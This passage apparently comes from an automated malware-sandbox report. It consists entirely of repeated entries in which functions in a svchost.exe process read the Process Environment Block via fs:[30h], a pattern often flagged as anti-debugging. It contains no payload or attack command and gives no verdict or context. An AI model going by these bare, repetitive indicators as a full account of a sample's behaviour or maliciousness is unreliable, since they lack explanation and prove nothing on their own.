            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h] 1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h] 1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h] 1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h] 1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h] 1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h] 1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03860124 mov eax, dword ptr fs:[00000030h] 1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h] 1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h] 1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h] 1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03836154 mov eax, dword ptr fs:[00000030h] 1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03904164 mov eax, dword ptr fs:[00000030h] 1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383208A mov eax, dword ptr fs:[00000030h] 1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h] 1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h] 1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h] 1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h] 1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h] 1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h] 1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h] 1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h] 1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h] 1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h] 1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h] 1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h] 1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h] 1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03832050 mov eax, dword ptr fs:[00000030h] 1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h] 1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h] 1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038D678E mov eax, dword ptr fs:[00000030h] 1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038307AF mov eax, dword ptr fs:[00000030h] 1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h] 1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h] 1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h] 1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038527ED mov eax, dword ptr fs:[00000030h] 1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h] 1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
